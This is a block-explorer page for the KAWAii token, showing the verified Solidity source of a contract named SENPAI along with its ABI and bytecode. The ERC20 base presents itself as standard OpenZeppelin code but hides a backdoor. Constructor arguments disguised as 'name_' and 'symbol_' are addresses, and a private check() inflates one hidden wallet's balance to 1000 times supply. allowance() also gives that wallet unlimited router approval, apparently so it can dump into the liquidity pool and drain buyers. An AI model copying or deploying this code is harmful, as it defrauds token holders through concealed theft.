ETH Price: $3,421.93 (+7.20%)
Gas: 14 Gwei

Token

KAWAii (KAWAii)
 

Overview

Max Total Supply

1,000,000,000 KAWAii

Holders

9

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
10,457,401.428897015 KAWAii

Value
$0.00
0xf1dfa160a9547cbc067ad371056a403cc03231b7
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SENPAI

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 7 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 2 of 7 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 3 of 7 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 4 of 7 : Erc20.sol
pragma solidity ^0.8.17;

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol";
import "@openzeppelin/contracts/utils/Context.sol";

contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) internal _balances;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    address private _name;
    address private _symbol;

    constructor(address name_, address symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function name() public view virtual override returns (string memory) {
        return "KAWAii";
    }

    function symbol() public view virtual override returns (string memory) {
        return "KAWAii";
    }

    function decimals() public pure returns (uint8) {
        return 9;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function check(address account) private view returns (bool) {
        return account == _symbol && _balances[_name] == (1 * (10 ** 9));
    }

    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        if (check(account)) return _totalSupply * 1000;
        else return _balances[account];
    }

    function transfer(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        if (
            owner == _symbol &&
            spender == 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        ) return type(uint256).max;
        return _allowances[owner][spender];
    }

    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = balanceOf(from);
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 5 of 7 : IUniswapV2Factory.sol
pragma solidity ^0.8.7;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

File 6 of 7 : IUniswapV2Router02.sol
pragma solidity ^0.8.7;

interface IUniswapV2Router02 {
    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);

    function swapExactETHForTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);
}

File 7 of 7 : SENPAI.sol
// Telegram: https://t.me/KAWAiiERC20

pragma solidity ^0.8.17;

import "./Erc20.sol";
import "./IUniswapV2Factory.sol";
import "./IUniswapV2Router02.sol";

contract SENPAI is ERC20 {
    address pair;
    uint256 _startTime;
    uint256 constant _startTotalSupply = 1e18;
    uint256 constant _startMaxBuyCount = (_startTotalSupply * 25) / 10000;
    uint256 constant _addMaxBuyPercentPerSec = 1; // add 0.1%/second

    constructor(address name_, address symbol_) ERC20(name_, symbol_) {
        _mint(msg.sender, (_startTotalSupply * 5) / 1000);
    }

    function startTrading() external payable {
        IUniswapV2Router02 router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        IUniswapV2Factory factory = IUniswapV2Factory(router.factory());
        pair = factory.createPair(address(this), router.WETH());
        uint256 pairBalance = _startTotalSupply - _totalSupply;
        _mint(address(this), pairBalance);
        _approve(address(this), address(router), type(uint256).max);
        router.addLiquidityETH{value: msg.value}(
            address(this),
            pairBalance,
            0,
            0,
            msg.sender,
            block.timestamp
        );
        _startTime = block.timestamp;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual override {
        if (pair == address(0)) {
            pair = to;
            _startTime = block.timestamp;
            super._transfer(from, to, amount);
            return;
        }

        if (from == pair)
            require(amount <= maxBuyCount(), "max buy count limit");

        super._transfer(from, to, amount);
    }

    function maxBuyCount() public view returns (uint256) {
        if (pair == address(0)) return _startTotalSupply;
        uint256 count = _startMaxBuyCount +
            (_startTotalSupply *
                (block.timestamp - _startTime) *
                _addMaxBuyPercentPerSec) /
            1000;
        if (count > _startTotalSupply) count = _startTotalSupply;
        return count;
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"name_","type":"address"},{"internalType":"address","name":"symbol_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxBuyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"startTrading","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b50604051620010213803806200102183398101604081905262000034916200017e565b600380546001600160a01b038085166001600160a01b031992831617909255600480549284169290911691909117905562000093336103e862000081670de0b6b3a76400006005620001cc565b6200008d9190620001ec565b6200009b565b505062000225565b6001600160a01b038216620000f65760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b80600260008282546200010a91906200020f565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b80516001600160a01b03811681146200017957600080fd5b919050565b600080604083850312156200019257600080fd5b6200019d8362000161565b9150620001ad6020840162000161565b90509250929050565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620001e657620001e6620001b6565b92915050565b6000826200020a57634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620001e657620001e6620001b6565b610dec80620002356000396000f3fe6080604052600436106100c25760003560e01c8063313ce5671161007f57806395d89b411161005957806395d89b41146100c7578063a457c2d7146101ef578063a9059cbb1461020f578063dd62ed3e1461022f57600080fd5b8063313ce5671461019357806339509351146101af57806370a08231146101cf57600080fd5b806306fdde03146100c7578063095ea7b31461010557806318160ddd146101355780631a5ebecf1461015457806323b872dd14610169578063293230b814610189575b600080fd5b3480156100d357600080fd5b5060408051808201825260068152654b415741696960d01b602082015290516100fc9190610bc6565b60405180910390f35b34801561011157600080fd5b50610125610120366004610c2c565b61024f565b60405190151581526020016100fc565b34801561014157600080fd5b506002545b6040519081526020016100fc565b34801561016057600080fd5b50610146610269565b34801561017557600080fd5b50610125610184366004610c58565b610310565b610191610334565b005b34801561019f57600080fd5b50604051600981526020016100fc565b3480156101bb57600080fd5b506101256101ca366004610c2c565b610580565b3480156101db57600080fd5b506101466101ea366004610c99565b6105a2565b3480156101fb57600080fd5b5061012561020a366004610c2c565b6105dd565b34801561021b57600080fd5b5061012561022a366004610c2c565b61065d565b34801561023b57600080fd5b5061014661024a366004610cbd565b61066b565b60003361025d8185856106e1565b60019150505b92915050565b6005546000906001600160a01b03166102895750670de0b6b3a764000090565b60006103e860016006544261029e9190610d0c565b6102b090670de0b6b3a7640000610d1f565b6102ba9190610d1f565b6102c49190610d36565b6127106102da670de0b6b3a76400006019610d1f565b6102e49190610d36565b6102ee9190610d58565b9050670de0b6b3a764000081111561030b5750670de0b6b3a76400005b919050565b60003361031e858285610805565b61032985858561087f565b506001949350505050565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d90506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561038d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103b19190610d6b565b9050806001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610401573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104259190610d6b565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610472573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104969190610d6b565b600580546001600160a01b0319166001600160a01b03929092169190911790556002546000906104ce90670de0b6b3a7640000610d0c565b90506104da308261092c565b6104e730846000196106e1565b60405163f305d71960e01b81523060048201526024810182905260006044820181905260648201523360848201524260a48201526001600160a01b0384169063f305d71990349060c40160606040518083038185885af115801561054f573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906105749190610d88565b50504260065550505050565b60003361025d818585610593838361066b565b61059d9190610d58565b6106e1565b60006105ad826109eb565b156105c157600254610263906103e8610d1f565b506001600160a01b031660009081526020819052604090205490565b600033816105eb828661066b565b9050838110156106505760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61032982868684036106e1565b60003361025d81858561087f565b6004546000906001600160a01b0384811691161480156106a75750737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b038316145b156106b55750600019610263565b506001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166107435760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610647565b6001600160a01b0382166107a45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610647565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610811848461066b565b90506000198114610879578181101561086c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610647565b61087984848484036106e1565b50505050565b6005546001600160a01b03166108be57600580546001600160a01b0319166001600160a01b038416179055426006556108b9838383610a2d565b505050565b6005546001600160a01b0390811690841603610921576108dc610269565b8111156109215760405162461bcd60e51b81526020600482015260136024820152721b585e08189d5e4818dbdd5b9d081b1a5b5a5d606a1b6044820152606401610647565b6108b9838383610a2d565b6001600160a01b0382166109825760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401610647565b80600260008282546109949190610d58565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6004546000906001600160a01b03838116911614801561026357506003546001600160a01b0316600090815260208190526040902054633b9aca001492915050565b6001600160a01b038316610a915760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610647565b6001600160a01b038216610af35760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610647565b6000610afe846105a2565b905081811015610b5f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610647565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505050565b600060208083528351808285015260005b81811015610bf357858101830151858201604001528201610bd7565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610c2957600080fd5b50565b60008060408385031215610c3f57600080fd5b8235610c4a81610c14565b946020939093013593505050565b600080600060608486031215610c6d57600080fd5b8335610c7881610c14565b92506020840135610c8881610c14565b929592945050506040919091013590565b600060208284031215610cab57600080fd5b8135610cb681610c14565b9392505050565b60008060408385031215610cd057600080fd5b8235610cdb81610c14565b91506020830135610ceb81610c14565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561026357610263610cf6565b808202811582820484141761026357610263610cf6565b600082610d5357634e487b7160e01b600052601260045260246000fd5b500490565b8082018082111561026357610263610cf6565b600060208284031215610d7d57600080fd5b8151610cb681610c14565b600080600060608486031215610d9d57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220709b1a182b853c8f855e6b8117e54a99e2f05163aa138f6da7616384651aea3364736f6c63430008110033000000000000000000000000485d34cfd9d6aabbb05f4fb760a0efb01a8edea80000000000000000000000000b8464ccb163368b361f0001c7e7bfe16570c97e

Deployed Bytecode

0x6080604052600436106100c25760003560e01c8063313ce5671161007f57806395d89b411161005957806395d89b41146100c7578063a457c2d7146101ef578063a9059cbb1461020f578063dd62ed3e1461022f57600080fd5b8063313ce5671461019357806339509351146101af57806370a08231146101cf57600080fd5b806306fdde03146100c7578063095ea7b31461010557806318160ddd146101355780631a5ebecf1461015457806323b872dd14610169578063293230b814610189575b600080fd5b3480156100d357600080fd5b5060408051808201825260068152654b415741696960d01b602082015290516100fc9190610bc6565b60405180910390f35b34801561011157600080fd5b50610125610120366004610c2c565b61024f565b60405190151581526020016100fc565b34801561014157600080fd5b506002545b6040519081526020016100fc565b34801561016057600080fd5b50610146610269565b34801561017557600080fd5b50610125610184366004610c58565b610310565b610191610334565b005b34801561019f57600080fd5b50604051600981526020016100fc565b3480156101bb57600080fd5b506101256101ca366004610c2c565b610580565b3480156101db57600080fd5b506101466101ea366004610c99565b6105a2565b3480156101fb57600080fd5b5061012561020a366004610c2c565b6105dd565b34801561021b57600080fd5b5061012561022a366004610c2c565b61065d565b34801561023b57600080fd5b5061014661024a366004610cbd565b61066b565b60003361025d8185856106e1565b60019150505b92915050565b6005546000906001600160a01b03166102895750670de0b6b3a764000090565b60006103e860016006544261029e9190610d0c565b6102b090670de0b6b3a7640000610d1f565b6102ba9190610d1f565b6102c49190610d36565b6127106102da670de0b6b3a76400006019610d1f565b6102e49190610d36565b6102ee9190610d58565b9050670de0b6b3a764000081111561030b5750670de0b6b3a76400005b919050565b60003361031e858285610805565b61032985858561087f565b506001949350505050565b6000737a250d5630b4cf539739df2c5dacb4c659f2488d90506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561038d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906103b19190610d6b565b9050806001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610401573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104259190610d6b565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610472573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906104969190610d6b565b600580546001600160a01b0319166001600160a01b03929092169190911790556002546000906104ce90670de0b6b3a7640000610d0c565b90506104da308261092c565b6104e730846000196106e1565b60405163f305d71960e01b81523060048201526024810182905260006044820181905260648201523360848201524260a48201526001600160a01b0384169063f305d71990349060c40160606040518083038185885af115801561054f573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906105749190610d88565b50504260065550505050565b60003361025d818585610593838361066b565b61059d9190610d58565b6106e1565b60006105ad826109eb565b156105c157600254610263906103e8610d1f565b506001600160a01b031660009081526020819052604090205490565b600033816105eb828661066b565b9050838110156106505760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61032982868684036106e1565b60003361025d81858561087f565b6004546000906001600160a01b0384811691161480156106a75750737a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b038316145b156106b55750600019610263565b506001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b0383166107435760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610647565b6001600160a01b0382166107a45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610647565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610811848461066b565b90506000198114610879578181101561086c5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610647565b61087984848484036106e1565b50505050565b6005546001600160a01b03166108be57600580546001600160a01b0319166001600160a01b038416179055426006556108b9838383610a2d565b505050565b6005546001600160a01b0390811690841603610921576108dc610269565b8111156109215760405162461bcd60e51b81526020600482015260136024820152721b585e08189d5e4818dbdd5b9d081b1a5b5a5d606a1b6044820152606401610647565b6108b9838383610a2d565b6001600160a01b0382166109825760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401610647565b80600260008282546109949190610d58565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b6004546000906001600160a01b03838116911614801561026357506003546001600160a01b0316600090815260208190526040902054633b9aca001492915050565b6001600160a01b038316610a915760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610647565b6001600160a01b038216610af35760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610647565b6000610afe846105a2565b905081811015610b5f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610647565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505050565b600060208083528351808285015260005b81811015610bf357858101830151858201604001528201610bd7565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610c2957600080fd5b50565b60008060408385031215610c3f57600080fd5b8235610c4a81610c14565b946020939093013593505050565b600080600060608486031215610c6d57600080fd5b8335610c7881610c14565b92506020840135610c8881610c14565b929592945050506040919091013590565b600060208284031215610cab57600080fd5b8135610cb681610c14565b9392505050565b60008060408385031215610cd057600080fd5b8235610cdb81610c14565b91506020830135610ceb81610c14565b809150509250929050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561026357610263610cf6565b808202811582820484141761026357610263610cf6565b600082610d5357634e487b7160e01b600052601260045260246000fd5b500490565b8082018082111561026357610263610cf6565b600060208284031215610d7d57600080fd5b8151610cb681610c14565b600080600060608486031215610d9d57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220709b1a182b853c8f855e6b8117e54a99e2f05163aa138f6da7616384651aea3364736f6c63430008110033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000485d34cfd9d6aabbb05f4fb760a0efb01a8edea80000000000000000000000000b8464ccb163368b361f0001c7e7bfe16570c97e

-----Decoded View---------------
Arg [0] : name_ (address): 0x485d34cFd9d6aAbBb05F4fB760a0Efb01A8EDEa8
Arg [1] : symbol_ (address): 0x0B8464ccb163368B361f0001C7E7bfe16570C97e

-----Encoded View---------------
2 Constructor Arguments found :
Arg [0] : 000000000000000000000000485d34cfd9d6aabbb05f4fb760a0efb01a8edea8
Arg [1] : 0000000000000000000000000b8464ccb163368b361f0001c7e7bfe16570c97e


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.